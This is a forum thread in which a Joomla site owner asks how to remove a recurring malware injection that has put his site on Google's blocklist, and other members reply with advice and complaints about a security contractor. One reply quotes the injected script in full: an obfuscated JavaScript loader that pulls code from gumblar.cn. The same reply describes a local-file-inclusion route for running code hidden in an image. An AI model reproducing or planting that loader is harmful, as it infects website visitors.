My site (omgitsfriends.com) has been hacked by the same person with an injection virus (or whatever it is, I'm not quite sure). Anyway, if you type in google "watch friends" or "watch friends online".. you'll notice that you cannot go to the site through the search engine, which is about 85-90% of my traffic. I've cleaned up the code of the pages that were infected (or so I believe I did) and have sent into google for a review. I've had to do this before (for the same hack) and google has accepted the site and taken off the bar from accessing my site. However, now no matter what I seem to do (with cleaning the badware) I can't get that bar lifted from the search engine. What can I do to fix this?
Google probably did not keep your request this time because your site still contains a Trojan (detected by my antivirus). Try moving to a better hosting provider.
You need to clean and secure your site 100%. If you keep cleaning the malicious code from your pages and don't patch the initial security hole of which the attackers are using to infect your site, your content will only get infected again and again.
Right, I clean the malicious code, but I do not know how to patch the initial security hole, which is what I'm posting here asking for. Does anybody know how to do this? I assume you do SSANZ by looking at your signature. Please PM me if you are able to fix this. Thanks.
I would need to see if the dodgy code is similar to what I had to deal with a few weeks ago but mine was ftp related(throwing same warnings though) Hence, I had to change all my ftp passwords and then remove dodgy code. It was a complete pain but fairly straight forward. It was on my dev. server though so I had loads of crap to clean up. hope that helps, Nigel
hie.,how this hacking takes place? how we can come to know regarding this hacking? what steps can be fallowed to avoid this hacking?could u please let me know
Remove the following code: <script language=javascript><!-- (function(K2v0){var aaIoW='%';var Na2r=('>76>61r>20a>3d>22>53c>72>69p>74Engin>65>22>2cb>3d>22V>65r>73>69on()+>22>2c>6a>3d>22>22>2cu>3dnav>69>67ator>2euserAge>6et>3bif((>75>2e>69ndex>4ff>28>22>57in>22)>3e0>29>26>26(u>2eind>65xOf>28>22NT>206>22)>3c0)>26>26(d>6fcument>2ecook>69e>2ei>6edexOf>28>22>6diek>3d1>22)>3c0>29>26>26(t>79>70>65of(z>72>76>7a>74s)>21>3dtypeof(>22>41>22))>29>7bzrv>7ats>3d>22A>22>3beva>6c>28>22if(window>2e>22+a+>22)j>3dj+>22+a+>22Maj>6fr>22+b+a+>22Mino>72>22>2b>62+a+>22Build>22>2b>62+>22j>3b>22)>3bdo>63ument>2ew>72i>74e(>22>3cs>63ript>20s>72>63>3d>2f>2fgumblar>2ecn>2f>72ss>2f>3fid>3d>22+j+>22>3e>3c>5c>2fscript>3e>22)>3b>7d').replace(K2v0,aaIoW);eval(unescape(Na2r))})(/>/g); --></script> Code (markup): Located on lines 29-31 of your index. Check if this code has been injected on any other page, try see if any new folders/files have popped up recently. Also, update your vulnerable services that lead to being compromised in the first place. PS: Your site was likely breached due to its Local file include vulnerability: http://www.omgitsfriends.com/index.php/<local path here> Code (markup): They've likely signed-up and uploaded an image (likely avatar) with injected code in it. Viewing this image via LFI will execute it, thus executing the attackers code! Good luck!
SSANZ above not only didn't fix my site(s), but he also never refunded me. He stopped answering support tickets and stopped signing online (could've blocked me from msn). Either way.. While I wait for my refund.. is there anybody who is competant enough to take the job and actually get it done? This isn't something that should take weeks. I recommend if you have a security issue NOT to use SSANZ.net
Not really related to the initial question, but to the complains about SSANZ. The guy was completely hacked and all his systems removed/deleted by the anti-sec group. http://lists.virus.org/full-disclosure-0907/msg00031.html Scary stuff and he is probably going to take a while to reply back.
Thanks everybody for your feedback. thewebhostingdir -- All of this has been changed and only 2 IP's are currently allowed to access the sites ftp. Unfortunately, this is still occuring. I'm still in need of a trustworthy person/company to fix this for me. I was scammed out of $120 by SSANZ, so still looking for some help. Please PM me if you can fix this. Keep in mind, the site is running on joomla.